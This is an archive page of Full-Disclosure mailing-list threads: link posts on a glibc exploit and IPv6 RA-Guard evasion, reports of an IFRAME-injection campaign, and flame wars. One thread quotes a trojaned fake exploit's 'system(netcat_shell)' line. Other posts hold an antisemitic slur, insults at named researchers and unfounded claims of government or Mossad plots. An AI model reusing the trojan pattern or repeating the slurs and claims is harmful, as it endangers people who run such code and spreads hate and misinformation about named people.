[Full-disclosure] More on exploiting glibc __tzfile_read integer overflow to buffer overflow and vsftpd
More on exploiting glibc __tzfile_read integer overflow to buffer overflow and vsftpd http://rcvalle.com/post/14261796328/more-on-exploiting-glibc-tzfile-read-integer-overflow -- Ramon de C Valle / Red Hat Security Response Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More on IPv6 RA-Guard evasion (IPv6 security)
Folks, We have posted on the SI6 Networks blog more information about IPv6 RA-Guard evasion, including pointers to the recent presentations at IETF 81. The post is available at: http://blog.si6networks.com/2011/09/router-advertisement-guard-ra-guard.html P.S.: In case you haven't, you may want to join the IPv6 Hackers mailing-list: http://www.si6networks.com/community/mailing-lists.html Thanks! Best regards, -- Fernando Gont SI6 Networks e-mail: fg...@si6networks.com web: http://www.si6networks.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] more on that
And this is what I'm talking about: http://seclists.org/fulldisclosure/2005/Apr/412 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] more on that
So youre whining about a 4 year old post? lol and who uses an exploit without changing the shellcode anyway From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Tyler Durten Sent: 24. november 2009 22:42 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] more on that And this is what I'm talking about: http://seclists.org/fulldisclosure/2005/Apr/412 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] more on that
On 24 Nov 2009, at 13:41, Tyler Durten wrote: And this is what I'm talking about: http://seclists.org/fulldisclosure/2005/Apr/412 ... which reads, in part: main() { //Section Initialises designs implemented by mexicans //Imigrate system(launcher); system(netcat_shell); system(shellcode); I can understand possibly overlooking something clever (like a fake exploit that buffer-overflows itself), but this isn't even marginally subtle. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] more on that
well, all that really depends on the theory that the OP actually read it prior to executing it. 2009/11/26 Andrew Farmer andf...@gmail.com On 24 Nov 2009, at 13:41, Tyler Durten wrote: And this is what I'm talking about: http://seclists.org/fulldisclosure/2005/Apr/412 ... which reads, in part: main() { //Section Initialises designs implemented by mexicans //Imigrate system(launcher); system(netcat_shell); system(shellcode); I can understand possibly overlooking something clever (like a fake exploit that buffer-overflows itself), but this isn't even marginally subtle. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
You're like a shite that won't flush away. On Tue, Dec 2, 2008 at 6:11 PM, Ureleet [EMAIL PROTECTED] wrote: all speculation: no 1 knows 4 sure. http://it.slashdot.org/article.pl?sid=07/12/17/1754257from=rss http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm c how i did that n3td3v? i posted links, nd talked about the article w/out stealing ppls work. pay attention. On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight [EMAIL PROTECTED] wrote: 2008/12/2 Ureleet [EMAIL PROTECTED] u arent getting it. it has nothing 2 do w/ backdoors. they r talking about actual backdoors in the code. so that anyone who knows the backdoor can acess any windows system regarless. they r saying that microsoft has coded backdoors into the system so that the govt can get into any system, patched or not. pay attention. I haven't seen anything that suggests that systems are/will be backdoored here. The text of the statement said remote searches which in legal terms could be anything from something as simple as browsing shared files available through P2P to full remote system access. Do you have anything else that suggests Windows has backdoors present other than this statement? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
pot kettle black On Wed, Dec 3, 2008 at 3:34 AM, n3td3v [EMAIL PROTECTED] wrote: You're like a shite that won't flush away. On Tue, Dec 2, 2008 at 6:11 PM, Ureleet [EMAIL PROTECTED] wrote: all speculation: no 1 knows 4 sure. http://it.slashdot.org/article.pl?sid=07/12/17/1754257from=rss http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm c how i did that n3td3v? i posted links, nd talked about the article w/out stealing ppls work. pay attention. On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight [EMAIL PROTECTED] wrote: 2008/12/2 Ureleet [EMAIL PROTECTED] u arent getting it. it has nothing 2 do w/ backdoors. they r talking about actual backdoors in the code. so that anyone who knows the backdoor can acess any windows system regarless. they r saying that microsoft has coded backdoors into the system so that the govt can get into any system, patched or not. pay attention. I haven't seen anything that suggests that systems are/will be backdoored here. The text of the statement said remote searches which in legal terms could be anything from something as simple as browsing shared files available through P2P to full remote system access. Do you have anything else that suggests Windows has backdoors present other than this statement? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
If there's a peace of shit around here that should be flushed, it's only you n3tcr4p No one like you, get the fuck back on your kiddie mailing list/group. 2008/12/3 n3td3v [EMAIL PROTECTED] You're like a shite that won't flush away. On Tue, Dec 2, 2008 at 6:11 PM, Ureleet [EMAIL PROTECTED] wrote: all speculation: no 1 knows 4 sure. http://it.slashdot.org/article.pl?sid=07/12/17/1754257from=rss http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm c how i did that n3td3v? i posted links, nd talked about the article w/out stealing ppls work. pay attention. On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight [EMAIL PROTECTED] wrote: 2008/12/2 Ureleet [EMAIL PROTECTED] u arent getting it. it has nothing 2 do w/ backdoors. they r talking about actual backdoors in the code. so that anyone who knows the backdoor can acess any windows system regarless. they r saying that microsoft has coded backdoors into the system so that the govt can get into any system, patched or not. pay attention. I haven't seen anything that suggests that systems are/will be backdoored here. The text of the statement said remote searches which in legal terms could be anything from something as simple as browsing shared files available through P2P to full remote system access. Do you have anything else that suggests Windows has backdoors present other than this statement? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
There are no kiddies on the group and any that appear get banned. On Wed, Dec 3, 2008 at 4:28 PM, j-f sentier [EMAIL PROTECTED] wrote: If there's a peace of shit around here that should be flushed, it's only you n3tcr4p No one like you, get the fuck back on your kiddie mailing list/group. 2008/12/3 n3td3v [EMAIL PROTECTED] You're like a shite that won't flush away. On Tue, Dec 2, 2008 at 6:11 PM, Ureleet [EMAIL PROTECTED] wrote: all speculation: no 1 knows 4 sure. http://it.slashdot.org/article.pl?sid=07/12/17/1754257from=rss http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm c how i did that n3td3v? i posted links, nd talked about the article w/out stealing ppls work. pay attention. On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight [EMAIL PROTECTED] wrote: 2008/12/2 Ureleet [EMAIL PROTECTED] u arent getting it. it has nothing 2 do w/ backdoors. they r talking about actual backdoors in the code. so that anyone who knows the backdoor can acess any windows system regarless. they r saying that microsoft has coded backdoors into the system so that the govt can get into any system, patched or not. pay attention. I haven't seen anything that suggests that systems are/will be backdoored here. The text of the statement said remote searches which in legal terms could be anything from something as simple as browsing shared files available through P2P to full remote system access. Do you have anything else that suggests Windows has backdoors present other than this statement? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
all speculation: no 1 knows 4 sure. http://it.slashdot.org/article.pl?sid=07/12/17/1754257from=rss http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm c how i did that n3td3v? i posted links, nd talked about the article w/out stealing ppls work. pay attention. On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight [EMAIL PROTECTED] wrote: 2008/12/2 Ureleet [EMAIL PROTECTED] u arent getting it. it has nothing 2 do w/ backdoors. they r talking about actual backdoors in the code. so that anyone who knows the backdoor can acess any windows system regarless. they r saying that microsoft has coded backdoors into the system so that the govt can get into any system, patched or not. pay attention. I haven't seen anything that suggests that systems are/will be backdoored here. The text of the statement said remote searches which in legal terms could be anything from something as simple as browsing shared files available through P2P to full remote system access. Do you have anything else that suggests Windows has backdoors present other than this statement? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
If they use zero-day exploits then thats illegal. Secondly, are they using zero-day exploits post on public mailing lists or using their own home grown exploits that the bad guys and potentially the vendor doesn't know about? On Mon, Dec 1, 2008 at 10:44 PM, Aaron Gray [EMAIL PROTECTED] wrote: proof, did you read the article ? They are after your bad guys and probably using zero day exploits !? On Mon, Dec 1, 2008 at 9:13 PM, n3td3v [EMAIL PROTECTED] wrote: http://news.bbc.co.uk/1/hi/technology/7758127.stm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More proof that Microsoft products are probably backdoored
Which court order? Post a link. On Mon, Dec 1, 2008 at 11:27 PM, Aaron Gray [EMAIL PROTECTED] wrote: Probably not with a court order. On Mon, Dec 1, 2008 at 10:51 PM, n3td3v [EMAIL PROTECTED] wrote: If they use zero-day exploits then thats illegal. Secondly, are they using zero-day exploits post on public mailing lists or using their own home grown exploits that the bad guys and potentially the vendor doesn't know about? On Mon, Dec 1, 2008 at 10:44 PM, Aaron Gray [EMAIL PROTECTED] wrote: proof, did you read the article ? They are after your bad guys and probably using zero day exploits !? On Mon, Dec 1, 2008 at 9:13 PM, n3td3v [EMAIL PROTECTED] wrote: http://news.bbc.co.uk/1/hi/technology/7758127.stm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] more rehashes of xss 'evil gif'
Clearly this class of vulnerabilities is nothing short of epic, entirely new, and truly worth our time and fear. When combined with the stellar research and presentation skills of said researchers it meets 3/4 requirements for widespread media cuntbaggery, observe: 1) words that sound new and cool --The attack relies on a new type of hybrid file hybrid: hybrid, hmm sort of hydra, sort of like internet super worm of doom??!! watchout! 2)social networking sites --giving the bad guys access to the victim's Facebook account. zomgz did someone say facebook? watch out, your teenage whore daughter is now at risk! 3)moderately not clever acronym --They call this type of file a GIFAR, a contraction of GIF and JAR plus it sounds like some sort of mythical beast?! GIFAR, ROAR! do you think they'll have a cool animation for it on their slides? one can only dream! wait, what about the 4th requirement? how about the possibility of anyone actually being owned? wait, no. On Tue, Aug 5, 2008 at 1:26 AM, Robert Holgstad [EMAIL PROTECTED] wrote: http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html seems dan isn't the only press whore around! rebouncing from his embarasing post about 'deputy dan' and the matasano blog - whoosh anyone? nate and his crew of javascript gurus have whipped up another rehash of an old class of bugs that has been used in the wild for a long time. we personally want to thank nate for his great work hes done for conferences over the years filling up their talking spots with useless crap. his work is only rivaled by gadi evron who gets accepted to every conference because declining a fat AND jewish person is guarenteed to get 1000s of big nosed ambulance chasers after you by the end of business day. once again we would ilke to thank nate for his cutting edge research and hopefully he will get nommed for next years pwnie life time acheivement award! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] more rehashes of xss 'evil gif'
On Tue, Aug 5, 2008 at 6:26 AM, Robert Holgstad [EMAIL PROTECTED] wrote: http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html seems dan isn't the only press whore around! rebouncing from his embarasing post about 'deputy dan' and the matasano blog - whoosh anyone? nate and his crew of javascript gurus have whipped up another rehash of an old class of bugs that has been used in the wild for a long time. we personally want to thank nate for his great work hes done for conferences over the years filling up their talking spots with useless crap. his work is only rivaled by gadi evron who gets accepted to every conference because declining a fat AND jewish person is guarenteed to get 1000s of big nosed ambulance chasers after you by the end of business day. once again we would ilke to thank nate for his cutting edge research and hopefully he will get nommed for next years pwnie life time acheivement award! Don't forget Funsec is run by Mossad and that all the silly people on that list who post on it don't realise what intelligence organization they are contributing to. Of course there is no publically available information to prove Gadi Evron has connections with Mossad, but I personally assume its probably the case. All the best, n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] more rehashes of xss 'evil gif'
http://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html seems dan isn't the only press whore around! rebouncing from his embarasing post about 'deputy dan' and the matasano blog - whoosh anyone? nate and his crew of javascript gurus have whipped up another rehash of an old class of bugs that has been used in the wild for a long time. we personally want to thank nate for his great work hes done for conferences over the years filling up their talking spots with useless crap. his work is only rivaled by gadi evron who gets accepted to every conference because declining a fat AND jewish person is guarenteed to get 1000s of big nosed ambulance chasers after you by the end of business day. once again we would ilke to thank nate for his cutting edge research and hopefully he will get nommed for next years pwnie life time acheivement award! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
On Mon, Mar 17, 2008 at 8:35 PM, [EMAIL PROTECTED] wrote: On Sat, 15 Mar 2008 08:44:29 -, worried security said: i call government involvement... worried if u are a government who wants an attack highly known about do you A) attack some random blog, or b) attack high profile news website? lots of rambling deleted Have you considered the possibility that it's actually the RBN or similar, making it *look* like a government is involved? ah, so you're not denying it does look like a government is involved?;) you've just made my day,week, year etc. sans institute, i've been mailing you all weekend and now a respected member of the security community has flagged it as well. all the best with that institute thingy. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
On Tue, Mar 18, 2008 at 1:06 AM, [EMAIL PROTECTED] wrote: On Mon, 17 Mar 2008 21:35:03 -, you said: Have you considered the possibility that it's actually the RBN or similar, making it *look* like a government is involved? ah, so you're not denying it does look like a government is involved?;) you've just made my day,week, year etc. Just because some people look at a large-scale, well-funded, organized effort and think government because that's all they can think of doesn't make it so. There are many organized crime syndicates in this world that have larger annual budgets than many country's total governmental budgets. Whether such organizations qualify as de factor governments in the areas they control is a question best left to the political scientists are you telling me RBN isn't protected by FSB? *a government* RBN and FSB have no political motivation to make an online attack look like its coming from China just for the sake of tricking the public into thinking China is a major online threat to society. however, western super powers do. whoever is behind this wanted more than gaming passwords, they wanted the attack highly investigated and known about, we can only speculate why. i looked at the bloggers picture and thought *i don't trust this guy, hes got that look about him*. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
On Sat, 15 Mar 2008 08:44:29 -, worried security said: i call government involvement... worried if u are a government who wants an attack highly known about do you A) attack some random blog, or b) attack high profile news website? lots of rambling deleted Have you considered the possibility that it's actually the RBN or similar, making it *look* like a government is involved? Given that the RBN crew probably knows more about hacking for fun and profit than most governments pgpvVxuKBdyZt.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
On Mon, 17 Mar 2008 21:35:03 -, you said: Have you considered the possibility that it's actually the RBN or similar, making it *look* like a government is involved? ah, so you're not denying it does look like a government is involved?;) you've just made my day,week, year etc. Just because some people look at a large-scale, well-funded, organized effort and think government because that's all they can think of doesn't make it so. There are many organized crime syndicates in this world that have larger annual budgets than many country's total governmental budgets. Whether such organizations qualify as de factor governments in the areas they control is a question best left to the political scientists pgpx3y1SRpiR1.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
On Wed, Mar 12, 2008 at 2:51 PM, Dancho Danchev [EMAIL PROTECTED] wrote: The ongoing monitoring of this campaign reveals that the group is continuing to expand the campaign, introducing over a hundred new bogus .info domains acting as traffic redirection points to the campaigns hardcoded within the secondary redirection point, in this case radt.info where a new malware variant of Zlob is attempting to install though an ActiveX object. Sample domains targeted within the past 48 hours : lib.ncsu.edu; fulldownloads.us; cso.ie; dblife.cs.wisc.edu; www-history.mcs.st-andrews.ac.uk; ehawaii.gov; timeanddate.com; boisestate.edu; aoa.gov; gustavus.edu; archive.org; gsbapps.stanford.edu; bushtorrent.com; ccie.com; uvm.edu; thehipp.org; mnsu.edu; camajorityreport.com; medicare.gov; usamriid.army.mil http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html Regards -- Dancho Danchev Cyber Threats Analyst/Blogger http://ddanchev.blogspot.com http://windowsecurity.com/Dancho_Danchev i call government involvement... worried if u are a government who wants an attack highly known about do you A) attack some random blog, or b) attack high profile news website? worried if are a gov who wants an attack highly known about,written about by the biggest technology sites, and investigated by everybody whos interested in security worried an unknown blog or a high profile news website worried a normal hacker would not do whats been done worried just to get some gay passwords worried this is the gov with a politcal agenda worried their not normal hackers they are state sponsored or are the actual us-gov worried normal hackers who want passwords do not hack cnet asia, they want their attack to be unfound as long as possible worried a normal hacker would not do whats been done worried just to get some gay passwords for world of warcraft worried why would a normal hacker who jsut wants a few gaming passwords hack a news site ? worried i would not want the media's attention or the global security research community knowing what i was doing, i would at all costs do everything possible to make sure news websites like cnet did not get infected cryptowave i've just spent the last several hours doing malware analysis that links back to china worried americans would make an attack link back to china cryptowave well, they are pretty convincing when every thing points back to china cryptowave domains registered there, ip located there, code with chinese cryptowave and they used chinese dollars to register the domains? cryptowave and used chinese email addresses too worried yes, all bases would be covered worried proper gov hackers know ppl like u are going to check details like that worried they put it on a high profile technology news website to make sure the attack was covered by internet news and the thing they wanted the security experts to find is the chinese connection cryptowave you don't need to write your code in chinese, register your domains via chinese registrars, use a chinese email address, etc worried western goverment hackers or western state sponsored hackers would go that far to convince everyone. cryptowave worried: you're jumping to conclusions ;) worried whoever is behind this wanted the attack to be known about and investigated with the core objective that the blame is on china worried and funnily enough the western gov world has a political agenda on that very topic right now, coincidence? worried the fact cnet asia,trend micro was hacked makes me highly suspicious of government involvement, normal hackers who just want a few gay gaming passwords, they would be the last people they would hack. worried this is political, this is done by the government to further bring public notice about chinese hackers as a pretext to ramp up the need for cyber commands, convince the whitehouse about offensive cyber security funding etc etc and the joe average middle american who dont know anything about the internet. these are my conspiracy theories, good bye dancho. what i say is probably bullshit, but you've got to wonder why the high profile sites, especially the biggest technology journalist site and anti virus site was hacked, why would a normal hacker do this for gay passwords?, all the benefits and rewards from this would be a government wanting an attack investigated that links back to china. our supposed number one cyber enemy, according to western super powers. they hacked cnet asia to make sure the asian news were covering the attack as well, to make sure the eventual finding of the china link was known by the public in asia as well. there is more to this than meets the eye of just normal hackers trying to get passwords, because of the type of the first websites which were hacked. a government here is wanting maximum publicity, thats not something small time hackers trying to get world of warcraft passwords want. there is a political game
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
I love the way whenever anything happens, someone always assumes its some big conspiracy. -- razi On 3/15/08, worried security [EMAIL PROTECTED] wrote: On Wed, Mar 12, 2008 at 2:51 PM, Dancho Danchev [EMAIL PROTECTED] wrote: The ongoing monitoring of this campaign reveals that the group is continuing to expand the campaign, introducing over a hundred new bogus .info domains acting as traffic redirection points to the campaigns hardcoded within the secondary redirection point, in this case radt.info where a new malware variant of Zlob is attempting to install though an ActiveX object. Sample domains targeted within the past 48 hours : lib.ncsu.edu; fulldownloads.us; cso.ie; dblife.cs.wisc.edu; www-history.mcs.st-andrews.ac.uk; ehawaii.gov; timeanddate.com; boisestate.edu; aoa.gov; gustavus.edu; archive.org; gsbapps.stanford.edu; bushtorrent.com; ccie.com; uvm.edu; thehipp.org; mnsu.edu; camajorityreport.com; medicare.gov; usamriid.army.mil http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html Regards -- Dancho Danchev Cyber Threats Analyst/Blogger http://ddanchev.blogspot.com http://windowsecurity.com/Dancho_Danchev i call government involvement... worried if u are a government who wants an attack highly known about do you A) attack some random blog, or b) attack high profile news website? worried if are a gov who wants an attack highly known about,written about by the biggest technology sites, and investigated by everybody whos interested in security worried an unknown blog or a high profile news website worried a normal hacker would not do whats been done worried just to get some gay passwords worried this is the gov with a politcal agenda worried their not normal hackers they are state sponsored or are the actual us-gov worried normal hackers who want passwords do not hack cnet asia, they want their attack to be unfound as long as possible worried a normal hacker would not do whats been done worried just to get some gay passwords for world of warcraft worried why would a normal hacker who jsut wants a few gaming passwords hack a news site ? worried i would not want the media's attention or the global security research community knowing what i was doing, i would at all costs do everything possible to make sure news websites like cnet did not get infected cryptowave i've just spent the last several hours doing malware analysis that links back to china worried americans would make an attack link back to china cryptowave well, they are pretty convincing when every thing points back to china cryptowave domains registered there, ip located there, code with chinese cryptowave and they used chinese dollars to register the domains? cryptowave and used chinese email addresses too worried yes, all bases would be covered worried proper gov hackers know ppl like u are going to check details like that worried they put it on a high profile technology news website to make sure the attack was covered by internet news and the thing they wanted the security experts to find is the chinese connection cryptowave you don't need to write your code in chinese, register your domains via chinese registrars, use a chinese email address, etc worried western goverment hackers or western state sponsored hackers would go that far to convince everyone. cryptowave worried: you're jumping to conclusions ;) worried whoever is behind this wanted the attack to be known about and investigated with the core objective that the blame is on china worried and funnily enough the western gov world has a political agenda on that very topic right now, coincidence? worried the fact cnet asia,trend micro was hacked makes me highly suspicious of government involvement, normal hackers who just want a few gay gaming passwords, they would be the last people they would hack. worried this is political, this is done by the government to further bring public notice about chinese hackers as a pretext to ramp up the need for cyber commands, convince the whitehouse about offensive cyber security funding etc etc and the joe average middle american who dont know anything about the internet. these are my conspiracy theories, good bye dancho. what i say is probably bullshit, but you've got to wonder why the high profile sites, especially the biggest technology journalist site and anti virus site was hacked, why would a normal hacker do this for gay passwords?, all the benefits and rewards from this would be a government wanting an attack investigated that links back to china. our supposed number one cyber enemy, according to western super powers. they hacked cnet asia to make sure the asian news were covering the attack as well, to make sure the eventual finding of the china link was known by the public in
Re: [Full-disclosure] More High Profile Sites IFRAME Injected
ya, it's political game over playing by the gov agencies to pinpoint CHINA where these issues are not covered by their law at all. I aware lots of undergrounds attacks where hackers were hired specially for this purpose but due to gov involvement it's just a game wait and watch Taneja Vikas http://www.annysoft.com On 3/15/08, Razi Shaban [EMAIL PROTECTED] wrote: I love the way whenever anything happens, someone always assumes its some big conspiracy. -- razi On 3/15/08, worried security [EMAIL PROTECTED] wrote: On Wed, Mar 12, 2008 at 2:51 PM, Dancho Danchev [EMAIL PROTECTED] wrote: The ongoing monitoring of this campaign reveals that the group is continuing to expand the campaign, introducing over a hundred new bogus .info domains acting as traffic redirection points to the campaigns hardcoded within the secondary redirection point, in this case radt.info where a new malware variant of Zlob is attempting to install though an ActiveX object. Sample domains targeted within the past 48 hours : lib.ncsu.edu; fulldownloads.us; cso.ie; dblife.cs.wisc.edu; www-history.mcs.st-andrews.ac.uk; ehawaii.gov; timeanddate.com; boisestate.edu; aoa.gov; gustavus.edu; archive.org; gsbapps.stanford.edu; bushtorrent.com; ccie.com; uvm.edu; thehipp.org ; mnsu.edu; camajorityreport.com; medicare.gov; usamriid.army.mil http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html Regards -- Dancho Danchev Cyber Threats Analyst/Blogger http://ddanchev.blogspot.com http://windowsecurity.com/Dancho_Danchev i call government involvement... worried if u are a government who wants an attack highly known about do you A) attack some random blog, or b) attack high profile news website? worried if are a gov who wants an attack highly known about,written about by the biggest technology sites, and investigated by everybody whos interested in security worried an unknown blog or a high profile news website worried a normal hacker would not do whats been done worried just to get some gay passwords worried this is the gov with a politcal agenda worried their not normal hackers they are state sponsored or are the actual us-gov worried normal hackers who want passwords do not hack cnet asia, they want their attack to be unfound as long as possible worried a normal hacker would not do whats been done worried just to get some gay passwords for world of warcraft worried why would a normal hacker who jsut wants a few gaming passwords hack a news site ? worried i would not want the media's attention or the global security research community knowing what i was doing, i would at all costs do everything possible to make sure news websites like cnet did not get infected cryptowave i've just spent the last several hours doing malware analysis that links back to china worried americans would make an attack link back to china cryptowave well, they are pretty convincing when every thing points back to china cryptowave domains registered there, ip located there, code with chinese cryptowave and they used chinese dollars to register the domains? cryptowave and used chinese email addresses too worried yes, all bases would be covered worried proper gov hackers know ppl like u are going to check details like that worried they put it on a high profile technology news website to make sure the attack was covered by internet news and the thing they wanted the security experts to find is the chinese connection cryptowave you don't need to write your code in chinese, register your domains via chinese registrars, use a chinese email address, etc worried western goverment hackers or western state sponsored hackers would go that far to convince everyone. cryptowave worried: you're jumping to conclusions ;) worried whoever is behind this wanted the attack to be known about and investigated with the core objective that the blame is on china worried and funnily enough the western gov world has a political agenda on that very topic right now, coincidence? worried the fact cnet asia,trend micro was hacked makes me highly suspicious of government involvement, normal hackers who just want a few gay gaming passwords, they would be the last people they would hack. worried this is political, this is done by the government to further bring public notice about chinese hackers as a pretext to ramp up the need for cyber commands, convince the whitehouse about offensive cyber security funding etc etc and the joe average middle american who dont know anything about the internet. these are my conspiracy theories, good bye dancho. what i say is probably bullshit, but you've got to wonder why the high profile sites, especially
[Full-disclosure] More High Profile Sites IFRAME Injected
The ongoing monitoring of this campaign reveals that the group is continuing to expand the campaign, introducing over a hundred new bogus .info domains acting as traffic redirection points to the campaigns hardcoded within the secondary redirection point, in this case radt.info where a new malware variant of Zlob is attempting to install though an ActiveX object. Sample domains targeted within the past 48 hours : lib.ncsu.edu; fulldownloads.us; cso.ie; dblife.cs.wisc.edu; www-history.mcs.st-andrews.ac.uk; ehawaii.gov; timeanddate.com; boisestate.edu; aoa.gov; gustavus.edu; archive.org; gsbapps.stanford.edu; bushtorrent.com; ccie.com; uvm.edu; thehipp.org; mnsu.edu; camajorityreport.com; medicare.gov; usamriid.army.mil http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html Regards -- Dancho Danchev Cyber Threats Analyst/Blogger http://ddanchev.blogspot.com http://windowsecurity.com/Dancho_Danchev ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More CNET Sites Under IFRAME Attack
With the recent IFRAME injection attack targeting ZDNet Asia, by abusing the site's search engine caching capabilities in a combination with the lack of input sanitization, several more CNET Networks' web properties besides ZDNet Asia, namely, TV.com, News.com and MySimon.com are currently getting targeted using the same technique to inject the IFRAMEs and have the sites cache and locally host the results. The following assessement outlines the IPs and domains used in the IFRAMEs, the domains and IPs hosting the rogue anti-virus and anti-spyware applications, as well as the detection rates of the applications. http://ddanchev.blogspot.com/2008/03/more-cnet-sites-under-iframe-attack.html Regards -- Dancho Danchev Cyber Threats Analyst/Blogger http://ddanchev.blogspot.com http://windowsecurity.com/Dancho_Danchev ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] more gobbles ..
Oh yes, please give much needed feedback on http://turkeychargen.blogspot.com .. GOBBLES need your support to calm these idiots down .. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More URI Handling Vulnerabilites (FireFox Remote Command Execution)
